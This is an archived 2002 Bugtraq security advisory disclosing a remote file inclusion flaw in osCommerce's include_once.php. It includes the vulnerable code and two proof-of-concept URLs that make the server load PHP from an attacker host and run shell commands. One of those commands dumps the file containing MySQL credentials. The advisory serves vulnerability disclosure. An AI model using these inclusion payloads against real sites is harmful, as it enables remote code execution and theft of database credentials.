[25830] in bugtraq
PHP source injection in osCommerce
daemon@ATHENA.MIT.EDU (Tim Vandermeerch)
Mon Jun 17 19:55:53 2002
Date: 16 Jun 2002 15:36:03 -0000
Message-ID: <20020616153603.22505.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Tim Vandermeerch <Tim.Vandermeersch@pandora.be>
To: bugtraq@securityfocus.com
PHP source injection in osCommerce
----------------------------------
Product Description
osCommerce is an open source e-commerce solution under on going
development by the open source community. Its feature packed out-of-the-
box installation allows store owners to setup, run, and maintain their
online stores with minimum effort and with no costs involved. It can be
found at http://www.oscommerce.com
Tested version
Preview Release 2.1 (06/03/2001)
(this is a preview version, but there are alot of online shops who use
this)
The Problem
osCommerce commes with a file called /catalog/includes/include_once.php,
and looks like this:
-------- include_once.php --------
<?
if (!defined($include_file . '__')) {
define($include_file . '__', 1);
include($include_file);
}
?>
----------------------------------
If someone request a URL like
http://SERVER/catalog/inludes/include_once.php?
include_file=FILE_WE_WANT_TO_INCLUDE, he would be able to include any code
he wants
This could be a serious problem because this user could query the SQL
server and get acccess to other important files...
Examples
-------- Example 1 --------
http://SERVER/catalog/inludes/include_once.php?
include_file=http://MYBOX/a.php
--- a.php ---
<? passthru("/bin/ls")?>
-------------
Output: dir listing of the current dierctory
---------------------------
-------- Example 2 --------
http://SERVER/catalog/inludes/include_once.php?
include_file=http://MYBOX/b.php
--- b.php ---
<? passthru("/bin/cat application_top.php")?>
-------------
Output: outputs the application_top.php file wich includes MySQL username,
password, ...
---------------------------
I informed the vendor and hope that they will release a patch soon
------------------------------
Tim Vandermeersch
Tim.Vandermeersch@pandora.be
